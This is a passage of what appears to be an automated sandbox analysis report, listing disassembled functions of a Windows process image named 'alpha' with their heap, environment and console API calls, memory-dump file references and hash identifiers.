                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1516AF1,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B39
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B30: RtlFreeHeap.NTDLL ref: 00007FF7D1516B4D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1516AF1,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B59
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1516B03
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1516B17
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3512109576-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8f4b1d5ce50235cd8df95cbb63a3d342c9287a43de6d3e78912ffcd14c768081
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E216B62A09A8B86FB05EB65D4142BCBBA0FB59B44FD48036CA4F47271DEBCA445C370
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B6D0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B6E7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B701
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B715
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocSize
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2549470565-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1975c8fa02f60c8097d6d8fc63ad62c8c6dc35d6443467d08fd32a81c75e7103
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10210E22A0964B86FF55AB11E45007CF6A1FB48B80BD99472DA4F03770DFBCE585C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1535690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7D1535433,?,?,?,00007FF7D15369B8,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D15356C5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D15356D9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7D1535433,?,?,?,00007FF7D15369B8,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D15356FD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1535711
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c1415feac54fe10fd994105a17aa43aff1488df15177523c56e77a3d61d14315
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E112872A04B99C6EB009F56E4040ACBBA0F749F84B998136DB8E03728DF38E556C750
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1524AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A28
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A66
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: memmove.MSVCRT(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D152EE64
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D152EE78
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2759988882-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: aeafd825acc0c2459856bf1129d0d12cf226c095d70a8de63a7ba88b8fc572ff
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CF03721A09A4B8AFF44AB66940417CE9D1EF8EB41BD88075C94F82361EE7CA5448220
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153F22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1606018815-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8beab73fc294975fae0c87a6bf992513190122a583313315714312053ba7887e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26F01C35A24A56CBE7446B11E8441BDFA60FF8AB02FD49275DA0B023B4DF7CD0088B60
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleTitle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: -
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3358957663-3695764949
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c360db95d29a2a970590f15769e2f1838fb5789d035dd07cb8545eaec306f515
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87317C22A0864B82FB05BB11A85407CFAA4BF49B90FD94136D90F477B6DFBCE491C764
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1527280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsnicmpswscanf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :EOF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1534968528-551370653
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 06d588baf97c95816b9c3c9e0cb62b0109f1a301a2bf34a38e374ceb7c50fda5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6318232A18A4B86FB54BB15E4502BDF2A0EF65B50FD44173EA4F462B1DFBCE841C660
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: 3$3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-2538865259
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 122d892b21f573a8c6b488a48e8ba572b5eb6560838035a42d71521a0751c07d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62011231D2E68B8AF716BB60E8A42BCB670BB51321FD50537E41B015B1CFECA484C670
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15206C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206F0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D152074D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D1520762
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
